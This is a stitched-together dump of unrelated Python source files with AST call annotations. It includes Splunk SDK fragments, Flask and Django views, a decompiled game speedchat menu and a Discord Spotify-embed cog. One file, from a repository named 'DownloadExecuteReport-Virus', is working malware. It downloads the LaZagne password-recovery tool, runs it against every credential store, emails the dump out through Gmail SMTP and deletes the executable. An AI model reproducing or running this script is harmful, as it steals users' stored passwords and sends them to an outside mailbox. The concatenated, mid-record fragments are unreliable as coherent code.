'from splunk_sdk.base_client import handle_response\n'), ((66, 15, 66, 50), 'string.Template', 'Template', ({(66, 24, 66, 49): '"""/action/v1beta2/actions"""'}, {}), "('/action/v1beta2/actions')", False, 'from string import Template\n'), ((83, 15, 83, 65), 'string.Template', 'Template', ({(83, 24, 83, 64): '"""/action/v1beta2/actions/${action_name}"""'}, {}), "('/action/v1beta2/actions/${action_name}')", False, 'from string import Template\n'), ((99, 15, 99, 65), 'string.Template', 'Template', ({(99, 24, 99, 64): '"""/action/v1beta2/actions/${action_name}"""'}, {}), "('/action/v1beta2/actions/${action_name}')", False, 'from string import Template\n'), ((116, 15, 116, 85), 'string.Template', 'Template', ({(116, 24, 116, 84): '"""/action/v1beta2/actions/${action_name}/status/${status_id}"""'}, {}), "('/action/v1beta2/actions/${action_name}/status/${status_id}')", False, 'from string import Template\n'), ((133, 15, 133, 93), 'string.Template', 'Template', ({(133, 24, 133, 92): '"""/action/v1beta2/actions/${action_name}/status/${status_id}/details"""'}, {}), "('/action/v1beta2/actions/${action_name}/status/${status_id}/details')", False, 'from string import Template\n'), ((148, 15, 148, 62), 'string.Template', 'Template', ({(148, 24, 148, 61): '"""/system/action/v1beta2/webhook/keys"""'}, {}), "('/system/action/v1beta2/webhook/keys')", False, 'from string import Template\n'), ((163, 15, 163, 50), 'string.Template', 'Template', ({(163, 24, 163, 49): 
'"""/action/v1beta2/actions"""'}, {}), "('/action/v1beta2/actions')", False, 'from string import Template\n'), ((179, 15, 179, 65), 'string.Template', 'Template', ({(179, 24, 179, 64): '"""/action/v1beta2/actions/${action_name}"""'}, {}), "('/action/v1beta2/actions/${action_name}')", False, 'from string import Template\n'), ((196, 15, 196, 65), 'string.Template', 'Template', ({(196, 24, 196, 64): '"""/action/v1beta2/actions/${action_name}"""'}, {}), "('/action/v1beta2/actions/${action_name}')", False, 'from string import Template\n')]
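A standalone sketch (not part of the SDK) of the path-templating idiom every generated method above relies on; the action name here is a made-up example.

from string import Template

path_params = {"action_name": "my-webhook-action"}
path = Template("/action/v1beta2/actions/${action_name}").substitute(path_params)
print(path)  # -> /action/v1beta2/actions/my-webhook-action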
zgoda/brewlog
src/brewlog/home/__init__.py
13a930b328f81d01a2be9aca07d3b14703b80faa
from flask import Blueprint home_bp = Blueprint('home', __name__) from . import views # noqa
[((4, 10, 4, 37), 'flask.Blueprint', 'Blueprint', ({(4, 20, 4, 26): '"""home"""', (4, 28, 4, 36): '__name__'}, {}), "('home', __name__)", False, 'from flask import Blueprint\n')]
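A hypothetical sketch (not part of the package) of registering the blueprint above on a Flask application; it assumes the brewlog package and its view dependencies are importable.

from flask import Flask
from brewlog.home import home_bp

app = Flask(__name__)
app.register_blueprint(home_bp)  # views are attached by the trailing import in the module above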
TheRavehorn/DownloadExecuteReport-Virus
main.py
9df26706e504d1df33e07c09fa56baa28d89f435
#!/usr/bin/env python3 import requests import subprocess import smtplib import re import os import tempfile def download(url): get_response = requests.get(url) file_name = url.split("/")[-1] with open(file_name, "wb") as f: f.write(get_response.content) def send_mail(email, password, message): server = smtplib.SMTP_SSL("smtp.gmail.com", "465") server.ehlo() server.login(email, password) server.sendmail(email, email, message) server.quit() temp_dir = tempfile.gettempdir() os.chdir(temp_dir) download("https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe") # LaZagne result = subprocess.check_output("lazagne.exe all", shell=True) send_mail("[email protected]", "yourpassword", result) os.remove("lazagne.exe")
[((25, 11, 25, 32), 'tempfile.gettempdir', 'tempfile.gettempdir', ({}, {}), '()', False, 'import tempfile\n'), ((26, 0, 26, 18), 'os.chdir', 'os.chdir', ({(26, 9, 26, 17): 'temp_dir'}, {}), '(temp_dir)', False, 'import os\n'), ((29, 9, 29, 63), 'subprocess.check_output', 'subprocess.check_output', (), '', False, 'import subprocess\n'), ((31, 0, 31, 24), 'os.remove', 'os.remove', ({(31, 10, 31, 23): '"""lazagne.exe"""'}, {}), "('lazagne.exe')", False, 'import os\n'), ((11, 19, 11, 36), 'requests.get', 'requests.get', ({(11, 32, 11, 35): 'url'}, {}), '(url)', False, 'import requests\n'), ((18, 13, 18, 54), 'smtplib.SMTP_SSL', 'smtplib.SMTP_SSL', ({(18, 30, 18, 46): '"""smtp.gmail.com"""', (18, 48, 18, 53): '"""465"""'}, {}), "('smtp.gmail.com', '465')", False, 'import smtplib\n')]
Kreastr/SmartAPI-HEILA
SmartAPI/rdf/LinkedList.py
97dbe9e6e27267c60a4f94f60692d5f391e2ef7f
from SmartAPI.rdf.List import List class LinkedList(List): def __init__(self): List.__init__(self)
[((6, 8, 6, 27), 'SmartAPI.rdf.List.List.__init__', 'List.__init__', ({(6, 22, 6, 26): 'self'}, {}), '(self)', False, 'from SmartAPI.rdf.List import List\n')]
dreamhaven/Frog
frog/views/gallery.py
66e50610d5059aa371e0a50b65ceddd4813b2bc1
################################################################################################## # Copyright (c) 2012 Brett Dixon # # Permission is hereby granted, free of charge, to any person obtaining a copy of # this software and associated documentation files (the "Software"), to deal in # the Software without restriction, including without limitation the rights to use, # copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the # Software, and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS # FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR # COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER # IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ################################################################################################## """ Gallery API :: GET / Lists the galleries currently visible by the current user POST / Creates a gallery object GET /id Gallery object if visible by the current user PUT /id Adds image or video objects to the gallery DELETE /id Removes image or video objects from the gallery GET /filter Returns a filtered list of image and video objects """ import time import functools import logging import requests from django.core.mail import mail_managers from django.http import JsonResponse from django.core.exceptions import ImproperlyConfigured, PermissionDenied from django.db.models import Q, Count from django.db import connection from django.db.utils import ProgrammingError from django.template.loader import render_to_string from django.views.decorators.http import require_POST from django.contrib.contenttypes.models import ContentType from django.contrib.auth.decorators import login_required from django.conf import settings import six import json try: from haystack.query import SearchQuerySet HAYSTACK = True except (ImportError, ImproperlyConfigured): HAYSTACK = False from frog.models import ( Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece, ) from frog.common import Result, getObjectsFromGuids, getClientIP LOGGER = logging.getLogger("frog") try: QUERY_MODELS = [ _ for _ in ContentType.objects.filter(app_label="frog") if issubclass(_.model_class(), Piece) ] except ProgrammingError: pass BATCH_LENGTH = 75 def index(request, obj_id=None): """Handles a request based on method and calls the appropriate function""" if request.method == "GET": return get(request, obj_id) elif request.method == "POST": return post(request) elif request.method == "PUT": return put(request, obj_id) elif request.method == "DELETE": return delete(request, obj_id) def get(request, obj_id=None): if obj_id: obj = Gallery.objects.get(pk=obj_id) if obj.security != Gallery.PUBLIC and request.user.is_anonymous: raise PermissionDenied else: res = Result() personal = [] clearance = Gallery.PUBLIC if request.user.is_authenticated: personal = Gallery.objects.filter( security=Gallery.PERSONAL, owner=request.user ) try: clearance = request.user.frog_prefs.first().clearance except AttributeError: clearance = Gallery.PUBLIC # Staff members should see 
everything if request.user.is_staff: clearance = Gallery.GUARDED objects = Gallery.objects.filter(security__lte=clearance) ids = [] for gallery in objects: if gallery.security == Gallery.PERSONAL: continue if gallery.id in ids: continue ids.append(gallery.id) res.append(gallery.json()) for gallery in personal: res.append(gallery.json()) return JsonResponse(res.asDict()) @login_required def post(request): """ Create a Gallery """ defaultname = "New Gallery %i" % Gallery.objects.all().count() data = json.loads(request.body)["body"] title = data.get("title", defaultname) description = data.get("description", "") security = int( data.get("security", request.user.frog_prefs.first().clearance) ) g, created = Gallery.objects.get_or_create(title=title) g.security = security g.description = description g.owner = request.user g.save() res = Result() res.append(g.json()) res.message = "Gallery created" if created else "" return JsonResponse(res.asDict()) @login_required def put(request, obj_id=None): """ Adds Image and Video objects to Gallery based on GUIDs """ data = json.loads(request.body)["body"] guids = data.get("guids", "").split(",") move = data.get("from") security = data.get("security") gallery = Gallery.objects.get(pk=obj_id) # Set the security first so subsequent securityChecks will get the correct security level if security is not None: gallery.security = json.loads(security) gallery.save() for child in gallery.gallery_set.all(): child.security = gallery.security child.save() if guids: items = getObjectsFromGuids(guids) gallery.addItems(items) if move: fromgallery = Gallery.objects.get(pk=move) fromgallery.removeItems(items) res = Result() res.append(gallery.json()) return JsonResponse(res.asDict()) @login_required def delete(request, obj_id=None): """ Removes ImageVideo objects from Gallery """ data = json.loads(request.body) guids = data.get("guids").split(",") items = getObjectsFromGuids(guids) gallery = Gallery.objects.get(pk=obj_id) LOGGER.info( "{} removed {} from {}".format(request.user.email, guids, gallery) ) gallery.removeItems(items) res = Result() return JsonResponse(res.asDict()) @login_required def filterObjects(request, obj_id): """ Filters Gallery for the requested ImageVideo objects. 
Returns a Result object with serialized objects """ if int(obj_id) == 0: obj = None else: obj = Gallery.objects.get(pk=obj_id) isanonymous = request.user.is_anonymous if isanonymous and obj is None: LOGGER.warning( "There was an anonymous access attempt from {} to {}".format( getClientIP(request), obj ) ) raise PermissionDenied() if isanonymous and obj and obj.security != Gallery.PUBLIC: LOGGER.warning( "There was an anonymous access attempt from {} to {}".format( getClientIP(request), obj ) ) raise PermissionDenied() if obj and obj.security != Gallery.PERSONAL: if request.user.frog_prefs.first().clearance < obj.security: raise PermissionDenied() tags = json.loads(request.GET.get("filters", "[[]]")) more = json.loads(request.GET.get("more", "false")) orderby = request.GET.get( "orderby", request.user.frog_prefs.get().json()["orderby"] ) tags = [t for t in tags if t] return _filter(request, obj, tags=tags, more=more, orderby=orderby) def _filter(request, object_, tags=None, more=False, orderby="created"): """Filters Piece objects from self based on filters, search, and range :param tags: List of tag IDs to filter :type tags: list :param more -- bool, Returns more of the same filtered set of images based on session range return list, Objects filtered """ res = Result() idDict = {} objDict = {} data = {} modelmap = {} # Get all IDs for each model for m in QUERY_MODELS: modelmap[m.model_class()] = m.model if object_: idDict[m.model] = m.model_class().objects.filter(gallery=object_) else: idDict[m.model] = m.model_class().objects.all() if idDict[m.model] is None: continue if tags: for bucket in tags: searchQuery = "" o = None for item in bucket: if item == 0: # filter by tagless idDict[m.model].annotate(num_tags=Count("tags")) if not o: o = Q() o |= Q(num_tags__lte=1) break elif isinstance(item, six.integer_types): # filter by tag if not o: o = Q() o |= Q(tags__id=item) else: # add to search string searchQuery += item + " " if not HAYSTACK: if not o: o = Q() # use a basic search o |= Q(title__icontains=item) if HAYSTACK and searchQuery != "": # once all tags have been filtered, filter by search searchIDs = search(searchQuery, m.model_class()) if searchIDs: if not o: o = Q() o |= Q(id__in=searchIDs) if o: # apply the filters idDict[m.model] = ( idDict[m.model] .annotate(num_tags=Count("tags")) .filter(o) ) else: idDict[m.model] = idDict[m.model].none() # Remove hidden items before slicing so we get an accurate count idDict[m.model] = idDict[m.model].exclude(hidden=True) # Remove deleted items before slicing so we get an accurate count idDict[m.model] = idDict[m.model].exclude(deleted=True) # Get all ids of filtered objects, this will be a very fast query idDict[m.model] = list( idDict[m.model] .order_by("-{}".format(orderby)) .values_list("id", flat=True) ) lastid = request.session.get("last_{}".format(m.model), 0) if not idDict[m.model]: continue if not more: lastid = idDict[m.model][0] try: index = idDict[m.model].index(lastid) except ValueError: index = 0 if more and lastid != 0: index += 1 idDict[m.model] = idDict[m.model][index : index + BATCH_LENGTH] # perform the main query to retrieve the objects we want objDict[m.model] = m.model_class().objects.filter( id__in=idDict[m.model] ) objDict[m.model] = ( objDict[m.model] .select_related("author") .prefetch_related("tags") .order_by("-{}".format(orderby)) ) objDict[m.model] = list(objDict[m.model]) # combine and sort all objects by date objects = _sortObjects(orderby, **objDict) objects = objects[:BATCH_LENGTH] # Find out last ids lastids = {} 
for obj in objects: lastids["last_{}".format(modelmap[obj.__class__])] = obj.id for key, value in lastids.items(): request.session[key] = value # serialize objects for i in objects: res.append(i.json()) data["count"] = len(objects) if settings.DEBUG: data["queries"] = connection.queries res.value = data return JsonResponse(res.asDict()) def _sortObjects(orderby="created", **kwargs): """Sorts lists of objects and combines them into a single list""" o = [] for m in kwargs.values(): for l in iter(m): o.append(l) o = list(set(o)) sortfunc = _sortByCreated if orderby == "created" else _sortByModified if six.PY2: o.sort(sortfunc) else: o.sort(key=functools.cmp_to_key(sortfunc)) return o def _sortByCreated(a, b): """Sort function for object by created date""" if a.created < b.created: return 1 elif a.created > b.created: return -1 else: return 0 def _sortByModified(a, b): """Sort function for object by modified date""" if a.modified < b.modified: return 1 elif a.modified > b.modified: return -1 else: return 0 def search(query, model): """ Performs a search query and returns the object ids """ query = query.strip() LOGGER.debug(query) sqs = SearchQuerySet() results = sqs.raw_search("{}*".format(query)).models(model) if not results: results = sqs.raw_search("*{}".format(query)).models(model) if not results: results = sqs.raw_search("*{}*".format(query)).models(model) return [o.pk for o in results] @require_POST @login_required def subscribe(request, obj_id): gallery = Gallery.objects.get(pk=obj_id) data = json.loads(request.body)["body"] frequency = data.get("frequency", GallerySubscription.WEEKLY) sub, created = GallerySubscription.objects.get_or_create( gallery=gallery, user=request.user, frequency=frequency ) if not created: # it already existed so delete it sub.delete() return JsonResponse(Result().asDict())
[((73, 9, 73, 34), 'logging.getLogger', 'logging.getLogger', ({(73, 27, 73, 33): '"""frog"""'}, {}), "('frog')", False, 'import logging\n'), ((150, 17, 150, 59), 'frog.models.Gallery.objects.get_or_create', 'Gallery.objects.get_or_create', (), '', False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((156, 10, 156, 18), 'frog.common.Result', 'Result', ({}, {}), '()', False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((170, 14, 170, 44), 'frog.models.Gallery.objects.get', 'Gallery.objects.get', (), '', False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((188, 10, 188, 18), 'frog.common.Result', 'Result', ({}, {}), '()', False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((197, 11, 197, 35), 'json.loads', 'json.loads', ({(197, 22, 197, 34): 'request.body'}, {}), '(request.body)', False, 'import json\n'), ((199, 12, 199, 38), 'frog.common.getObjectsFromGuids', 'getObjectsFromGuids', ({(199, 32, 199, 37): 'guids'}, {}), '(guids)', False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((200, 14, 200, 44), 'frog.models.Gallery.objects.get', 'Gallery.objects.get', (), '', False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((208, 10, 208, 18), 'frog.common.Result', 'Result', ({}, {}), '()', False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((266, 10, 266, 18), 'frog.common.Result', 'Result', ({}, {}), '()', False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((435, 10, 435, 26), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ({}, {}), '()', False, 'from haystack.query import SearchQuerySet\n'), ((448, 14, 448, 44), 'frog.models.Gallery.objects.get', 'Gallery.objects.get', (), '', False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((452, 19, 454, 5), 'frog.models.GallerySubscription.objects.get_or_create', 'GallerySubscription.objects.get_or_create', (), '', False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((99, 14, 99, 44), 'frog.models.Gallery.objects.get', 'Gallery.objects.get', (), '', False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((103, 14, 103, 22), 'frog.common.Result', 'Result', ({}, {}), '()', False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((121, 18, 121, 65), 'frog.models.Gallery.objects.filter', 'Gallery.objects.filter', (), '', False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((143, 11, 143, 35), 'json.loads', 'json.loads', ({(143, 22, 143, 34): 'request.body'}, {}), '(request.body)', False, 'import json\n'), ((166, 11, 166, 35), 'json.loads', 'json.loads', ({(166, 22, 166, 34): 'request.body'}, {}), '(request.body)', False, 'import json\n'), ((174, 27, 174, 47), 'json.loads', 'json.loads', ({(174, 38, 174, 46): 'security'}, {}), '(security)', False, 'import json\n'), ((181, 16, 181, 42), 'frog.common.getObjectsFromGuids', 'getObjectsFromGuids', ({(181, 36, 181, 41): 'guids'}, {}), '(guids)', False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((222, 14, 222, 44), 'frog.models.Gallery.objects.get', 'Gallery.objects.get', (), '', False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, 
SiteConfig, Piece\n'), ((232, 14, 232, 32), 'django.core.exceptions.PermissionDenied', 'PermissionDenied', ({}, {}), '()', False, 'from django.core.exceptions import ImproperlyConfigured, PermissionDenied\n'), ((240, 14, 240, 32), 'django.core.exceptions.PermissionDenied', 'PermissionDenied', ({}, {}), '()', False, 'from django.core.exceptions import ImproperlyConfigured, PermissionDenied\n'), ((449, 11, 449, 35), 'json.loads', 'json.loads', ({(449, 22, 449, 34): 'request.body'}, {}), '(request.body)', False, 'import json\n'), ((77, 17, 77, 61), 'django.contrib.contenttypes.models.ContentType.objects.filter', 'ContentType.objects.filter', (), '', False, 'from django.contrib.contenttypes.models import ContentType\n'), ((109, 23, 111, 13), 'frog.models.Gallery.objects.filter', 'Gallery.objects.filter', (), '', False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((185, 26, 185, 54), 'frog.models.Gallery.objects.get', 'Gallery.objects.get', (), '', False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((244, 18, 244, 36), 'django.core.exceptions.PermissionDenied', 'PermissionDenied', ({}, {}), '()', False, 'from django.core.exceptions import ImproperlyConfigured, PermissionDenied\n'), ((142, 37, 142, 58), 'frog.models.Gallery.objects.all', 'Gallery.objects.all', ({}, {}), '()', False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((229, 16, 229, 36), 'frog.common.getClientIP', 'getClientIP', ({(229, 28, 229, 35): 'request'}, {}), '(request)', False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((237, 16, 237, 36), 'frog.common.getClientIP', 'getClientIP', ({(237, 28, 237, 35): 'request'}, {}), '(request)', False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((406, 19, 406, 49), 'functools.cmp_to_key', 'functools.cmp_to_key', ({(406, 40, 406, 48): 'sortfunc'}, {}), '(sortfunc)', False, 'import functools\n'), ((460, 24, 460, 32), 'frog.common.Result', 'Result', ({}, {}), '()', False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((295, 29, 295, 47), 'django.db.models.Q', 'Q', (), '', False, 'from django.db.models import Q, Count\n'), ((317, 29, 317, 48), 'django.db.models.Q', 'Q', (), '', False, 'from django.db.models import Q, Count\n'), ((294, 32, 294, 35), 'django.db.models.Q', 'Q', ({}, {}), '()', False, 'from django.db.models import Q, Count\n'), ((301, 29, 301, 45), 'django.db.models.Q', 'Q', (), '', False, 'from django.db.models import Q, Count\n'), ((316, 32, 316, 35), 'django.db.models.Q', 'Q', ({}, {}), '()', False, 'from django.db.models import Q, Count\n'), ((292, 58, 292, 71), 'django.db.models.Count', 'Count', ({(292, 64, 292, 70): '"""tags"""'}, {}), "('tags')", False, 'from django.db.models import Q, Count\n'), ((300, 32, 300, 35), 'django.db.models.Q', 'Q', ({}, {}), '()', False, 'from django.db.models import Q, Count\n'), ((309, 33, 309, 57), 'django.db.models.Q', 'Q', (), '', False, 'from django.db.models import Q, Count\n'), ((307, 36, 307, 39), 'django.db.models.Q', 'Q', ({}, {}), '()', False, 'from django.db.models import Q, Count\n'), ((323, 43, 323, 56), 'django.db.models.Count', 'Count', ({(323, 49, 323, 55): '"""tags"""'}, {}), "('tags')", False, 'from django.db.models import Q, Count\n')]
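A standalone sketch (not part of the Frog app) of the newest-first ordering idiom used by _sortObjects/_sortByCreated above, with a stand-in record type instead of real Piece objects.

import functools
from collections import namedtuple

Item = namedtuple('Item', 'name created')

def sort_by_created(a, b):
    # cmp-style comparator: newer items sort first
    if a.created < b.created:
        return 1
    elif a.created > b.created:
        return -1
    return 0

items = [Item('a', 1), Item('b', 3), Item('c', 2)]
items.sort(key=functools.cmp_to_key(sort_by_created))
print([i.name for i in items])  # -> ['b', 'c', 'a']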
itsyaboyrocket/pirates
pirates/speedchat/PSpeedChatQuestMenu.py
6ca1e7d571c670b0d976f65e608235707b5737e3
# uncompyle6 version 3.2.0 # Python bytecode 2.4 (62061) # Decompiled from: Python 2.7.14 (v2.7.14:84471935ed, Sep 16 2017, 20:19:30) [MSC v.1500 32 bit (Intel)] # Embedded file name: pirates.speedchat.PSpeedChatQuestMenu from otp.speedchat.SCMenu import SCMenu from otp.speedchat.SCTerminal import * from otp.speedchat.SCStaticTextTerminal import SCStaticTextTerminal from pirates.quest.Quest import Quest from pirates.speedchat.PSpeedChatQuestTerminal import * from pirates.pirate.LocalPirate import * from pirates.quest.QuestStatus import * from pirates.quest.QuestDNA import * class PSpeedChatQuestMenu(SCMenu): __module__ = __name__ def __init__(self): SCMenu.__init__(self) self.accept('localAvatarQuestAdded', self.__questMenuRefresh) self.accept('localAvatarQuestUpdate', self.__questMenuRefresh) self.accept('localAvatarQuestItemUpdate', self.__questMenuRefresh) self.accept('localAvatarQuestComplete', self.__questMenuRefresh) self.accept('localAvatarQuestDeleted', self.__questMenuRefresh) def destroy(self): SCMenu.destroy(self) def __questMenuRefresh(self, quest, item=None, note=None): self.clearMenu() quests = localAvatar.questStatus.getCurrentQuests() if quests is None: return for quest in quests: q = quest if q is None: continue if not q.isComplete(): self.__questAddSCChat(q) return def __questAddSCChat(self, quest): qId = quest.questId qDNA = QuestDB.QuestDict.get(qId) if not qDNA: return qInt = qDNA.questInt i = 0 for task in quest.questDNA.getTasks(): if len(quest.getSCSummaryText(0)) > 2: self.append(PSpeedChatQuestTerminal(quest.getSCSummaryText(i), qInt, quest.giverId, 0, i)) if len(quest.getSCWhereIsText(0)) > 2: self.append(PSpeedChatQuestTerminal(quest.getSCWhereIsText(i), qInt, quest.giverId, 1, i)) if len(quest.getSCHowToText(0)) > 2: self.append(PSpeedChatQuestTerminal(quest.getSCHowToText(i), qInt, quest.giverId, 2, i)) i = i + 1
[((18, 8, 18, 29), 'otp.speedchat.SCMenu.SCMenu.__init__', 'SCMenu.__init__', ({(18, 24, 18, 28): 'self'}, {}), '(self)', False, 'from otp.speedchat.SCMenu import SCMenu\n'), ((26, 8, 26, 28), 'otp.speedchat.SCMenu.SCMenu.destroy', 'SCMenu.destroy', ({(26, 23, 26, 27): 'self'}, {}), '(self)', False, 'from otp.speedchat.SCMenu import SCMenu\n')]
R3XET/coffee-cogs
spotifyembed/spotifyembed.py
e7658213449ec140edaaf322514eaafb575f99bd
# from redbot.core import Config from redbot.core import Config, commands, checks import asyncio import aiohttp import discord from discord import Webhook, AsyncWebhookAdapter import re class Spotifyembed(commands.Cog): """Automatically send a reply to Spotify links with a link to the embed preview. Convenient for mobile users who can finally listen to music samples from Discord, without needing an account.""" def __init__(self, bot): self.bot = bot self.config = Config.get_conf(self, identifier=806715409318936616) default_guild = { "spotifyembedEnabled": False, } self.config.register_guild(**default_guild) @commands.group(aliases=["setspembed", "setspe"]) @checks.guildowner_or_permissions() async def setspotifyembed(self, ctx: commands.Context): """Set Spotify Embed settings""" if not ctx.invoked_subcommand: # Guild settings e = discord.Embed(color=(await ctx.embed_colour()), title="Guild Settings", description="") e.add_field(name="spotifyembedEnabled", value=(await self.config.guild(ctx.guild).spotifyembedEnabled()), inline=False) await ctx.send(embed=e) @setspotifyembed.command(name="enable") async def setspembedenable(self, ctx): """Enable auto-responding to Spotify links""" await self.config.guild(ctx.guild).spotifyembedEnabled.set(True) await ctx.message.add_reaction("✅") @setspotifyembed.command(name="disable") async def setspembeddisable(self, ctx): """Disable auto-responding to Spotify links""" await self.config.guild(ctx.guild).spotifyembedEnabled.set(False) await ctx.message.add_reaction("✅") @commands.command(aliases=["spembed", "spe"]) async def spotifyembed(self, ctx, spotifyLink, asMyself: bool=False): """Return a Spotify embed link Can set asMyself to true/false, for sending as webhook""" spembedSplit = spotifyLink.split('.com/') sendMsg = spembedSplit[0] + ".com/embed/" + spembedSplit[1] if asMyself == False: return await ctx.send(sendMsg) elif asMyself == True: # Find a webhook that the bot made try: whooklist = await ctx.channel.webhooks() whurl = "" # Return if match for wh in whooklist: if self.bot.user == wh.user: whurl = wh.url # Make new webhook if one didn't exist if whurl == "": newHook = await ctx.channel.create_webhook(name="Webhook") whurl = newHook.url async with aiohttp.ClientSession() as session: webhook = Webhook.from_url(whurl, adapter=AsyncWebhookAdapter(session)) await webhook.send( sendMsg, username=ctx.author.display_name, avatar_url=ctx.author.avatar_url, ) except discord.errors.Forbidden: return await ctx.send(sendMsg) else: return await ctx.send("An error occurred.") @commands.Cog.listener() async def on_message(self, message: discord.Message): if message.author.bot: return if message.webhook_id: return if message.guild is None: return spotifyembedEnabled = await self.config.guild(message.guild).spotifyembedEnabled() if spotifyembedEnabled is not True: return # Ignore if we find [p]spotifyembed in the trigger message spembedCommandIgnore = r"^\S{1,9}(spotifyembed|spembed|spe)(?=\s|$)" spembedCommands = re.findall(spembedCommandIgnore, message.clean_content) if len(spembedCommands) > 0: return # Ignore if we find no spotify links in the trigger message spembedFinder = r"https\:\/\/open\.spotify\.com\/\w{4,12}\/\w{14,26}(?=\?|$|\s)" spembedMatches = re.findall(spembedFinder, message.clean_content) if len(spembedMatches) <= 0: return sendMsg = "" for match in spembedMatches: spembedSplit = match.split('.com/') sendMsg += spembedSplit[0] + ".com/embed/" + spembedSplit[1] + "\n" # Find a webhook that the bot made try: whooklist = await 
message.channel.webhooks() whurl = "" # Return if match for wh in whooklist: if self.bot.user == wh.user: whurl = wh.url # Make new webhook if one didn't exist if whurl == "": newHook = await message.channel.create_webhook(name="Webhook") whurl = newHook.url async with aiohttp.ClientSession() as session: webhook = Webhook.from_url(whurl, adapter=AsyncWebhookAdapter(session)) await webhook.send( sendMsg, username=message.author.display_name, avatar_url=message.author.avatar_url, ) except discord.errors.Forbidden: return await message.channel.send(sendMsg)
[((21, 5, 21, 53), 'redbot.core.commands.group', 'commands.group', (), '', False, 'from redbot.core import Config, commands, checks\n'), ((22, 5, 22, 39), 'redbot.core.checks.guildowner_or_permissions', 'checks.guildowner_or_permissions', ({}, {}), '()', False, 'from redbot.core import Config, commands, checks\n'), ((43, 5, 43, 49), 'redbot.core.commands.command', 'commands.command', (), '', False, 'from redbot.core import Config, commands, checks\n'), ((79, 5, 79, 28), 'redbot.core.commands.Cog.listener', 'commands.Cog.listener', ({}, {}), '()', False, 'from redbot.core import Config, commands, checks\n'), ((14, 22, 14, 74), 'redbot.core.Config.get_conf', 'Config.get_conf', (), '', False, 'from redbot.core import Config, commands, checks\n'), ((92, 26, 92, 81), 're.findall', 're.findall', ({(92, 37, 92, 57): 'spembedCommandIgnore', (92, 59, 92, 80): 'message.clean_content'}, {}), '(spembedCommandIgnore, message.clean_content)', False, 'import re\n'), ((97, 25, 97, 73), 're.findall', 're.findall', ({(97, 36, 97, 49): 'spembedFinder', (97, 51, 97, 72): 'message.clean_content'}, {}), '(spembedFinder, message.clean_content)', False, 'import re\n'), ((120, 23, 120, 46), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ({}, {}), '()', False, 'import aiohttp\n'), ((67, 27, 67, 50), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ({}, {}), '()', False, 'import aiohttp\n'), ((121, 58, 121, 86), 'discord.AsyncWebhookAdapter', 'AsyncWebhookAdapter', ({(121, 78, 121, 85): 'session'}, {}), '(session)', False, 'from discord import Webhook, AsyncWebhookAdapter\n'), ((68, 62, 68, 90), 'discord.AsyncWebhookAdapter', 'AsyncWebhookAdapter', ({(68, 82, 68, 89): 'session'}, {}), '(session)', False, 'from discord import Webhook, AsyncWebhookAdapter\n')]
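A standalone sketch (not part of the cog) of the link rewrite the cog performs on matched Spotify URLs; the track ID is only an example.

link = "https://open.spotify.com/track/4uLU6hMCjMI75M1A2tKUQC"
head, tail = link.split('.com/')
embed_link = head + ".com/embed/" + tail
print(embed_link)  # -> https://open.spotify.com/embed/track/4uLU6hMCjMI75M1A2tKUQC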